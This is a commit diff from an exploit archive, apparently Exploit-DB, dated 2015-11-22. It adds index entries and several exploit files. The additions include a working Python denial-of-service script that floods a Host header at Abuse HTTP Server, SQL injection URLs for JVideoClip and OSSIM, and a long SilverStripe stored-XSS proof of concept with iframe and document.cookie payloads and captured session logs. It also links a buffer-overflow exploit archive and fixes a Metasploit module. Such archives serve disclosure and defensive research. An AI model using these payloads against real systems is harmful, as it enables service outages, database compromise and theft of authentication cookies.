DB: 2015-11-22

5 new exploits

files.csv

@@ -35014,6 +35014,7 @@ id,file,description,date,author,platform,type,port
 38739,platforms/java/webapps/38739.txt,"SearchBlox Multiple Information Disclosure Vulnerabilities",2013-08-23,"Ricky Roane Jr",java,webapps,0
 38740,platforms/php/webapps/38740.txt,"cm3 Acora CMS 'top.aspx' Information Disclosure Vulnerability",2013-08-26,"Pedro Andujar",php,webapps,0
 38741,platforms/linux/remote/38741.txt,"Nmap Arbitrary File Write Vulnerability",2013-08-06,"Piotr Duszynski",linux,remote,0
+38742,platforms/windows/remote/38742.txt,"Aloaha PDF Suite Stack Based Buffer Overflow Vulnerability",2013-08-28,"Marcos Accossatto",windows,remote,0
 38744,platforms/php/webapps/38744.txt,"appRain CMF Multiple Cross Site Request Forgery Vulnerabilities",2013-08-29,"Yashar shahinzadeh",php,webapps,0
 38745,platforms/php/webapps/38745.txt,"Xibo 'layout' Parameter HTML Injection Vulnerability",2013-08-21,"Jacob Holcomb",php,webapps,0
 38746,platforms/php/webapps/38746.html,"Xibo Cross Site Request Forgery Vulnerability",2013-08-21,"Jacob Holcomb",php,webapps,0
@@ -35043,5 +35044,9 @@ id,file,description,date,author,platform,type,port
 38770,platforms/php/webapps/38770.txt,"MentalJS Sandbox Security Bypass Vulnerability",2013-09-20,"Rafay Baloch",php,webapps,0
 38771,platforms/windows/dos/38771.py,"ShareKM Remote Denial of Service Vulnerability",2013-09-22,"Yuda Prawira",windows,dos,0
 38773,platforms/hardware/webapps/38773.txt,"ZTE ZXHN H108N R1A_ ZXV10 W300 Routers - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",hardware,webapps,0
+38781,platforms/php/webapps/38781.txt,"AlienVault Open Source SIEM (OSSIM) 3.1 'date_from' Parameter Multiple SQL Injection Vulnerabilities",2013-10-02,"Yu-Chi Ding",php,webapps,0
 38775,platforms/linux/local/38775.rb,"Chkrootkit Local Privilege Escalation",2015-11-20,metasploit,linux,local,0
 38776,platforms/cgi/webapps/38776.txt,"Cambium ePMP 1000 - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",cgi,webapps,0
+38777,platforms/php/webapps/38777.txt,"Joomla! JVideoClip Component 'uid' Parameter SQL Injection Vulnerability",2013-09-21,SixP4ck3r,php,webapps,0
+38779,platforms/multiple/dos/38779.py,"Abuse HTTP Server Remote Denial of Service Vulnerability",2013-09-30,"Zico Ekel",multiple,dos,0
+38780,platforms/php/webapps/38780.txt,"SilverStripe Multiple HTML Injection Vulnerabilities",2013-09-23,"Benjamin Kunz Mejri",php,webapps,0

platforms/multiple/dos/38779.py

@@ -0,0 +1,31 @@
+source: http://www.securityfocus.com/bid/62723/info
+
+Abuse HTTP Server is prone to a remote denial-of-service vulnerability.
+
+Attackers can exploit this issue to cause denial-of-service conditions.
+
+Abuse HTTP Server version 2.08 is vulnerable; other versions may also be affected. 
+
+#!/usr/bin/python
+
+import socket
+import os
+import sys
+
+crash = "0" * 504
+
+buffer="GET / HTTP/1.1\r\n"
+buffer+="Host: " + crash + "\r\n"
+buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
+buffer+="User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1\r\n"
+buffer+="Content-Length : 1048580\r\n\r\n"
+
+print "[*] Exploit c0ded by Zee Eichel - zee[at]cr0security.com"
+print "[*] Change some option in code with your self"
+print "[*] Connect to host and send payload"
+
+expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
+expl.connect(("192.168.1.101", 80))
+expl.send(buffer)
+print "[*] Server Disconected"
+expl.close()

platforms/php/remote/38660.rb

@@ -8,7 +8,11 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::Remote::HTTP::Wordpress
+  # EDB note:
+  # This line causes an error when loading 
+  # include Msf::Exploit::Remote::HTTP::Wordpress
+  # Replaced with the following:
+  include Msf::HTTP::Wordpress
   include Msf::Exploit::FileDropper
 
   def initialize(info = {})

platforms/php/webapps/38777.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/62610/info
+
+The JVideoClip component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+JVideoClip 1.5.1 is vulnerable; other versions may also be affected. 
+
+http://www.example/index.php?option=com_jvideoclip&view=search&type=user&uid=[SQLi]&Itemid=6 

platforms/php/webapps/38780.txt

@@ -0,0 +1,415 @@
+source: http://www.securityfocus.com/bid/62782/info
+
+SilverStripe is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible.
+
+SilverStripe 3.0.5 is vulnerable; other versions may also be affected. 
+
+Proof of Concept:
+=================
+1.1
+The first persistent input validation web vulnerability can be exploited 
+by remote attackers with low privileged application user accounts and 
+low required user interaction. For demonstration or reproduce ...
+
+
+PoC: Groups & Rollen (Roles) - Print 
+
+<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" 
+lang="en"><head>
+<title>SilverStripe - Sicherheit</title>
+<link rel="stylesheet" type="text/css" 
+href="/framework/css/GridField_print.css?m=1346228458">
+</head>
+<body onload="window.print();">
+<h3>SilverStripe - Sicherheit</h3>
+<table>
+<thead>
+<tr><th>Vorname</th><th>Nachname</th><th>E-Mail</th></tr>
+</thead>
+<tbody>	
+</tbody>
+</table>
+<p>
+Gedruckt am 11:44pm, 22/09/2013
+<br>
+Gedruckt von a%20>"<iframe src="a" onload="alert("BKM")<" a%20="" 
+a%20<="">>"<iframe src=a onload=alert("BKM")<
+</p>
+</body>
+</html>
+</iframe></p></body></html>
+
+
+POST 
+http://www.example.com/admin/security/EditForm/field/Groups/item/new/ItemEditForm 
+Load Flags[LOAD_BYPASS_CACHE  LOAD_BACKGROUND  ] 
+Content Size[20] Mime Type[text/html]
+   
+Request Headers:
+Host[www.example.com]
+User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 
+Firefox/23.0]
+Accept[*/*]
+Accept-Language[en-US,en;q=0.5]
+Accept-Encoding[gzip, deflate]
+DNT[1]
+Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
+X-Pjax[CurrentForm,Breadcrumbs]
+X-Requested-With[XMLHttpRequest]
+Referer[http://www.example.com/admin/security/EditForm/field/Groups/item/new]
+Content-Length[336]
+Cookie[__utma=1.1338660565.1379847695.1379847695.1379847695.1; 
+__utmb=1.8.10.1379847695; __utmc=1; 
+__utmz=1.1379847695.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); 
+PHPSESSID=3cdf3fce42b710fc8e1da69d18cc0dc4; PastMember=1; 
+cms-panel-collapsed-cms-content-tools-CMSPagesController=true; 
+cms-panel-collapsed-cms-menu=false; 
+cms-panel-collapsed-cms-content-tools-ModelAdmin=false; 
+__utma=1.1551299670.1379847854.1379847854.1379847854.1; 
+__utmc=1; 
+__utmz=1.1379847854.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); 
+cms-panel-collapsed-cms-content-tools-AssetAdmin=true; 
+cms-panel-collapsed-cms-content-tools-CMSMain=false; 
+cms-panel-collapsed-cms-content-tools-CMSPageHistoryController=false]
+Connection[keep-alive]
+Pragma[no-cache]
+Cache-Control[no-cache]
+   
+Post Data:
+Title[a%2520%3C%2F%3E%3E%22%3Ciframe+src%3Da+onload%3Dalert(%22BKM%22)%3C++++a%2520%3C%2F%3E%3E%22%3Ciframe+src%3Da+onload%3Dalert(%22BKM%22)%3C]
+ParentID[]
+ID[]
+SecurityID[1d6ca7e871bd6ec855f9409e25e030359c5b435f]
+action_doSave[1]
+BackURL[http%3A%2F%2Fwww.example.com%2Fadmin%2Fsecurity%2FEditForm%2Ffield%2FGroups%2Fitem%2Fnew%2F]
+
+
+Response Headers:
+Server[nginx]
+Date[Sun, 22 Sep 2013 11:44:20 GMT]
+Content-Type[text/html; charset=utf-8]
+Connection[keep-alive]
+Expires[Thu, 19 Nov 1981 08:52:00 GMT]
+Cache-Control[no-cache, max-age=0, must-revalidate]
+Pragma[no-cache]
+Set-Cookie[PastMember=1; expires=Sat, 21-Dec-2013 11:44:20 GMT; path=/; 
+httponly]
+X-ControllerURL[admin/security/EditForm/field/Groups/item/4]
+X-Pjax[CurrentForm,Breadcrumbs]
+X-Controller[SecurityAdmin]
+X-Title[SilverStripe - Sicherheit]
+X-Include-JS[/assets/_combinedfiles/lib.js?m=1379847629,/framework/thirdparty/tinymce/tiny_mce_gzip.php?m=1346228525&js=1&
+plugins=contextmenu%2Ctable%2Cemotions%2Cpaste%2Cspellchecker%2Cmedia%2Cfullscreen
+%2Cinlinepopups&themes=advanced&languages=de&diskcache=true&src=false,/assets/_combinedfiles/leftandmain.js?
+m=1379847630,/framework/admin/javascript/SecurityAdmin.js?m=1346228457,/framework/javascript/PermissionCheckboxSetField.js?m=1346228484]
+X-Include-CSS[/framework/admin/thirdparty/jquery-notice/jquery.notice.css?m=1346228458,/framework/thirdparty/jquery-ui-themes/smoothness/jquery-ui.css?
+m=1346228525,/framework/admin/thirdparty/chosen/chosen/chosen.css?m=1346228457,/framework/thirdparty/jstree/themes/apple/style.css?
+m=1346228525,/framework/css/TreeDropdownField.css?m=1346228458,/framework/admin/css/screen.css?m=1346228456,/framework/css/GridField.css?m=1346228458]
+Vary[Accept-Encoding]
+Content-Encoding[gzip]
+Content-Length[20]
+
+
+Status: 200[OK]
+GET http://www.example.com/admin/security/EditForm/field/Groups/item/4 
+Load Flags[LOAD_BACKGROUND  ] 
+Content Size[3966] Mime Type[text/html]
+
+
+Request Headers:
+Host[www.example.com]
+User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 
+Firefox/23.0]
+Accept[*/*]
+Accept-Language[en-US,en;q=0.5]
+Accept-Encoding[gzip, deflate]
+DNT[1]
+X-Pjax[CurrentForm,Breadcrumbs]
+X-Requested-With[XMLHttpRequest]
+Referer[http://www.example.com/admin/security/EditForm/field/Groups/item/4]
+Cookie[__utma=1.1338660565.1379847695.1379847695.1379847695.1; 
+__utmb=1.8.10.1379847695; __utmc=1;
+ 
+__utmz=1.1379847695.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); 
+PHPSESSID=3cdf3fce42b710fc8e1da69d18cc0dc4; PastMember=1; 
+cms-panel-collapsed-cms-content-tools-CMSPagesController=true; 
+cms-panel-collapsed-cms-menu=false; 
+cms-panel-collapsed-cms-content-tools-ModelAdmin=false; 
+__utma=1.1551299670.1379847854.1379847854.1379847854.1; __utmc=1; 
+__utmz=1.1379847854.1.1.utmcsr=google|utmccn=(organic)|utmcmd=
+organic|utmctr=(not%20provided); 
+cms-panel-collapsed-cms-content-tools-AssetAdmin=true; 
+cms-panel-collapsed-cms-content-tools-CMSMain=false; 
+cms-panel-collapsed-cms-content-tools-CMSPageHistoryController=false]
+Connection[keep-alive]
+
+
+Response Headers:
+Server[nginx]
+Date[Sun, 22 Sep 2013 11:44:21 GMT]
+Content-Type[text/html; charset=utf-8]
+Connection[keep-alive]
+Expires[Thu, 19 Nov 1981 08:52:00 GMT]
+Cache-Control[no-cache, max-age=0, must-revalidate]
+Pragma[no-cache]
+Set-Cookie[PastMember=1; expires=Sat, 21-Dec-2013 11:44:21 GMT; path=/; 
+httponly]
+X-Controller[SecurityAdmin]
+X-Title[SilverStripe - Sicherheit]
+X-Include-JS[/assets/_combinedfiles/lib.js?m=1379847629,/framework/thirdparty/tinymce/tiny_mce_gzip.php?m=1346228525&js=1&
+plugins=contextmenu%2Ctable%2Cemotions%2Cpaste%2Cspellchecker%2Cmedia%2Cfullscreen
+%2Cinlinepopups&themes=advanced&languages=de&diskcache=true&src=false,/assets/_combinedfiles/leftandmain.js?
+m=1379847630,/framework/admin/javascript/SecurityAdmin.js?m=1346228457,/framework/javascript/PermissionCheckboxSetField.js?m=1346228484]
+X-Include-CSS[/framework/admin/thirdparty/jquery-notice/jquery.notice.css?m=
+1346228458,/framework/thirdparty/jquery-ui-themes/smoothness/jquery-ui.css?m=1346228525,/framework/admin/thirdparty/chosen/chosen/chosen.css?
+m=1346228457,/framework/thirdparty/jstree/themes/apple/style.css?m=1346228525,/framework/css/TreeDropdownField.css?m=1346228458,
+/framework/admin/css/screen.css?m=1346228456,/framework/css/GridField.css?m=1346228458,/framework/css/CheckboxSetField.css?m=1346228458]
+Vary[Accept-Encoding]
+Content-Encoding[gzip]
+Content-Length[3966]
+
+
+Status: 200[OK]
+GET 
+http://www.example.com/admin/security/EditForm/field/Groups/item/4/ItemEditForm/
+field/Members?Title=a%2520%3C%2F%3E%3E%22%3Ciframe+src%3Da+onload%3Dalert
+(%22BKM%22)%3C++++a%252&ParentID=&gridfield_relationsearch=&Members%5B
+GridState%5D=%7B%22GridFieldAddRelation%22%3A%5B%5D%2C%22GridFieldSortableHeader%22%3A%7B%22SortColumn%22%3A%5B%5D%7D%2C%22
+GridFieldFilterHeader%22%3A%7B%22Columns%22%3A%5B%5D%7D%2C%22GridFieldPaginator%22%3A%7B%22currentPage%22%3A1%7D%2C%22
+GridFieldSearchRelation%22%3A%5B%5D%7D&filter%5BFirstName%5D=&filter%5BSurname%5D=&filter%5BEmail
+%5D=&ID=4&SecurityID=1d6ca7e871bd6ec855f9409e25e030359c5b435f&action_gridFieldAlterAction%3FStateID%3D523ed8157c4b68_95954854=Drucken   
+<==
+Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] 
+Content Size[378] 
+Mime Type[text/html]
+
+
+Request Headers:
+Host[www.example.com]
+User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 
+Firefox/23.0]
+Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+Accept-Language[en-US,en;q=0.5]
+Accept-Encoding[gzip, deflate]
+DNT[1]
+Referer[http://www.example.com/admin/security/EditForm/field/Groups/item/4]
+Cookie[__utma=1.1338660565.1379847695.1379847695.1379847695.1; 
+__utmb=1.8.10.1379847695; __utmc=1; 
+__utmz=1.1379847695.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); 
+PHPSESSID=3cdf3fce42b710fc8e1da69d18cc0dc4; PastMember=1; cms-panel-
+collapsed-cms-content-tools-CMSPagesController=true; 
+cms-panel-collapsed-cms-menu=false; 
+cms-panel-collapsed-cms-content-tools-ModelAdmin=false; 
+__utma=1.1551299670.1379847854.1379847854.1379847854.1; 
+__utmc=1; 
+__utmz=1.1379847854.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); 
+cms-panel-collapsed-cms-content-tools-AssetAdmin=true; 
+cms-panel-collapsed-cms-content-tools-CMSMain=false; 
+cms-panel-collapsed-cms-content-tools-CMSPageHistoryController=false]
+Connection[keep-alive]
+
+
+Response Headers:
+Server[nginx]
+Date[Sun, 22 Sep 2013 11:44:26 GMT]
+Content-Type[text/html; charset=utf-8]
+Connection[keep-alive]
+Expires[Thu, 19 Nov 1981 08:52:00 GMT]
+Cache-Control[no-cache, max-age=0, must-revalidate]
+Pragma[no-cache]
+Set-Cookie[PastMember=1; expires=Sat, 21-Dec-2013 11:44:26 GMT; path=/; 
+httponly]
+X-Controller[SecurityAdmin]
+X-Title[SilverStripe - Sicherheit]
+Vary[Accept-Encoding]
+Content-Encoding[gzip]
+Content-Length[378]
+
+
+Status: 200[OK]
+GET 
+http://www.example.com/admin/security/EditForm/field/Groups/item/4/ItemEditForm/field/[PERSISTENT 
+INJECTED SCRIPT CODE AS PATH!]
+Load Flags[LOAD_DOCUMENT_URI  ] 
+Content Size[20] 
+Mime Type[text/html]
+
+
+Request Headers:
+Host[www.example.com]
+User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 
+Firefox/23.0]
+Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+Accept-Language[en-US,en;q=0.5]
+Accept-Encoding[gzip, deflate]
+DNT[1]
+Referer[http://www.example.com/admin/security/EditForm/field/Groups/item/4/ItemEditForm/field/
+Members?Title=a%2520%3C%2F%3E%3E%22%3Ciframe+src%3Da+onload
+%3Dalert(%22BKM%22)%3C++++a%252&ParentID=&gridfield_relationsearch=&Members%5B
+GridState%5D=%7B%22GridFieldAddRelation%22%3A%5B%5D%2C%22GridFieldSortableHeader%22%3A%7B%22SortColumn%22%3A%5B%5D%7D%2C%22
+GridFieldFilterHeader%22%3A%7B%22Columns%22%3A%5B%5D%7D%2C%22GridFieldPaginator%22%3A%7B%22currentPage%22%3A1%7D%2C%22
+GridFieldSearchRelation%22%3A%5B%5D%7D&filter%5BFirstName%5D=&filter%5BSurname%5D=&filter%5BEmai%5D=&ID=4&
+SecurityID=1d6ca7e871bd6ec855f9409e25e030359c5b435f&action_gridFieldAlterAction%3FStateID%3D523ed8157c4b68_95954854=Drucken]
+Cookie[__utma=1.1338660565.1379847695.1379847695.1379847695.1; 
+__utmb=1.8.10.1379847695; __utmc=1; 
+__utmz=1.1379847695.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); 
+PHPSESSID=3cdf3fce42b710fc8e1da69d18cc0dc4; 
+PastMember=1; 
+cms-panel-collapsed-cms-content-tools-CMSPagesController=true; 
+cms-panel-collapsed-cms-menu=false; 
+cms-panel-collapsed-cms-content-tools-ModelAdmin=false; 
+__utma=1.1551299670.1379847854.1379847854.1379847854.1; __utmc=1; 
+__utmz=1.1379847854.1.1.utmcsr=google|
+utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); 
+cms-panel-collapsed-cms-content-tools-AssetAdmin=true; 
+cms-panel-collapsed-cms-content-tools-CMSMain=false; 
+cms-panel-collapsed-cms-content-tools-CMSPageHistoryController=false]
+Connection[keep-alive]
+
+
+Response Headers:
+Server[nginx]
+Date[Sun, 22 Sep 2013 11:44:27 GMT]
+Content-Type[text/html; charset=utf-8]
+Connection[keep-alive]
+Expires[Thu, 19 Nov 1981 08:52:00 GMT]
+Cache-Control[no-cache, max-age=0, must-revalidate]
+Pragma[no-cache]
+Set-Cookie[PastMember=1; expires=Sat, 21-Dec-2013 11:44:27 GMT; path=/; 
+httponly]
+X-Controller[SecurityAdmin]
+X-Title[SilverStripe - Sicherheit]
+Vary[Accept-Encoding]
+Content-Encoding[gzip]
+Content-Length[20]
+
+
+
+PoC: (Client-Side Link)
+http://www.example.com/admin/security/EditForm/field/Groups/item/4/ItemEditForm/field/Members
+?Title=a%25[PERSISTENT INJECTED SCRIPT 
+CODE!]%3C++++a%252&ParentID=&gridfield_relationsearch=&
+Members%5BGridState%5D=%7B%22GridFieldAddRelation%22%3A%5B%5D%2C%22GridFieldSortableHeader%22%3A%7B%22SortColumn%22%3A%5B%5D%7D%2
+C%22GridFieldFilterHeader%22%3A%7B%22Columns%22%3A%5B%5D%7D%2C%22GridFieldPaginator%22%3A%7B%22
+currentPage%22%3A1%7D%2C%22GridFieldSearchRelation%22%3A%5B%5D%7D&filter%5BFirstName%5D=&filter%5BSurname%5D=&filter%5BEmail
+%5D=&ID=4&SecurityID=1d6ca7e871bd6ec855f9409e25e030359c5b435f&action_gridFieldAlterAction%3FStateID%3D523ed8157c4b68_95954854=Drucken
+
+
+Reference(s):
+http://ss3.demo.silverstripe.org/admin/security/show/root#Root_Roles
+http://ss3.demo.silverstripe.org/admin/security/EditForm/field/Groups/item/1/edit
+http://www.example.com/admin/security/EditForm/field/Roles/item/new
+http://www.example.com/admin/security/EditForm/field/Groups/item/new/ItemEditForm
+http://www.example.com/admin/security/EditForm/field/Groups/item/4
+http://www.example.com/admin/security/EditForm/field/Groups/item/4/ItemEditForm/field/x
+
+
+
+
+
+
+1.2
+The secound persistent input validation web vulnerability and filter 
+bypass vulnerability can be exploited by remote attackers 
+with low privileged application user accounts with low required user 
+interaction. For demonstration or reproduce ...
+
+
+PoC: Model Admin > Add Company > Edit Company
+
+<span class="message validation">'>"<[PERSISTENT INJECTED SCRIPT 
+CODE!]>' ist kein numerischer Wert, 
+nur nummerische Werte sind in diesem Feld erlaubt</span>
+</div>
+<div id="CEO" class="field text">
+<label class="left" for="Form_ItemEditForm_CEO">CEO</label>
+<div class="middleColumn">
+<input type="text" name="CEO" value=">"<[PERSISTENT INJECTED SCRIPT 
+CODE!])</script>" class="text" id="Form_ItemEditForm_CEO" />
+</div>
+
+Note: The vulnerability is located in the message validation filter 
+exception-handling.
+
+
+
+--- PoC Session Request Logs ---
+
+Status: 200[OK]
+POST 
+http://www.example.com/admin/test/Company/EditForm/field/Company/item/new/ItemEditForm 
+Load Flags[LOAD_BYPASS_CACHE  LOAD_BACKGROUND  ] 
+Content Size[1309]
+Mime Type[text/html]
+
+
+Request Headers:
+Host[www.example.com]
+User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 
+Firefox/23.0]
+Accept[*/*]
+Accept-Language[en-US,en;q=0.5]
+Accept-Encoding[gzip, deflate]
+DNT[1]
+Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
+X-Pjax[CurrentForm,Breadcrumbs]
+X-Requested-With[XMLHttpRequest]
+Referer[http://www.example.com/admin/test/Company/EditForm/field/Company/item/new?q[Name]=&q[Category]=&q[Revenue]=&q[CEO]=]
+Content-Length[560]
+Cookie[__utma=1.1338660565.1379847695.1379847695.1379847695.1; 
+__utmb=1.7.10.1379847695; __utmc=1; 
+__utmz=1.1379847695.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); 
+PHPSESSID=3cdf3fce42b710fc8e1da69d18cc0dc4; PastMember=1; 
+cms-panel-collapsed-cms-content-tools-CMSPagesController=true; 
+cms-panel-collapsed-cms-menu=false; 
+cms-panel-collapsed-cms-content-tools-ModelAdmin=false; 
+__utma=1.1551299670.1379847854.1379847854.1379847854.1; 
+__utmb=1.5.10.1379847854; __utmc=1; 
+__utmz=1.1379847854.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided)]
+Connection[keep-alive]
+Pragma[no-cache]
+Cache-Control[no-cache]
+
+
+Post Data:
+Name[Evolution+Security]
+Category[TEST+PP]
+Revenue[%3E%22%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com%3E%3Cscript+alert(document.cookie)%3C%2Fscript%3E]      
+<= [PERSISTENT INJECTED TEST CODES!]
+CEO[%3E%22%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com%3E%3Cscript+alert(document.cookie)%3C%2Fscript%3E]
+RelationFieldsTestPageID[]
+GridFieldTestPageHasOneID[]
+SecurityID[1d6ca7e871bd6ec855f9409e25e030359c5b435f]
+action_doSave[1]
+BackURL 
+[http%3A%2F%2Fwww.example.com%2Fadmin%2Ftest%2FCompany%2FEditForm%2Ffield%2FCompany%2Fitem%2F
+new%3Fq%5BName%5D%3D%26q%5BCategory%5D%3D%26q%5BRevenue%5D%3D%26q%5BCEO%5D%3D%2F]
+   
+
+Response Headers:
+Server[nginx]
+Date[Sun, 22 Sep 2013 11:20:33 GMT]
+Content-Type[text/html]
+Connection[keep-alive]
+Expires[Thu, 19 Nov 1981 08:52:00 GMT]
+Cache-Control[no-cache, max-age=0, must-revalidate]
+Pragma[no-cache]
+Set-Cookie[PastMember=1; expires=Sat, 21-Dec-2013 11:20:32 GMT; path=/; 
+httponly]
+X-Controller[TestModelAdmin]
+X-Title[SilverStripe - Test ModelAdmin]
+X-Include-JS[/assets/_combinedfiles/lib.js?m=1379847629,/framework/thirdparty/tinymce/tiny_mce_gzip.php?m=1346228525&js=1&
+plugins=contextmenu%2Ctable%2Cemotions%2Cpaste%2Cspellchecker%2Cmedia%2Cfullscreen
+%2Cinlinepopups&themes=advanced&languages=de&diskcache=true&src=false,/assets/_combinedfiles/leftandmain.js?
+m=1379847630,/framework/admin/javascript/ModelAdmin.js?m=1346228457]
+X-Include-CSS[/framework/admin/thirdparty/jquery-notice/jquery.notice.css?m=1346228458,
+/framework/thirdparty/jquery-ui-themes/smoothness/jquery-ui.css?m=1346228525,/framework/admin/thirdparty/chosen/chosen/chosen.css?
+m=1346228457,/framework/thirdparty/jstree/themes/apple/style.css?m=1346228525,/framework/css/TreeDropdownField.css?m=1346228458,
+/framework/admin/css/screen.css?m=1346228456,/framework/css/GridField.css?m=1346228458]
+Vary[Accept-Encoding]
+Content-Encoding[gzip]
+Content-Length[1309]
+
+

platforms/php/webapps/38781.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/62790/info
+
+Open Source SIEM (OSSIM) is prone to multiple SQL-injection vulnerabilities.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Open Source SIEM (OSSIM) 4.3.0 and prior are vulnerable. 
+
+http://www.example.com/RadarReport/radar-iso27001-potential.php?date_from=%Inject_Here%
+
+http://www.example.com/RadarReport/radar-iso27001-A12IS_acquisition-pot.php?date_from=%Inject_Here% 

platforms/windows/remote/38742.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/62036/info
+
+Aloaha PDF Suite is prone to a stack-based buffer-overflow vulnerability.
+
+Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely cause denial-of-service conditions. 
+
+https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/62036.zip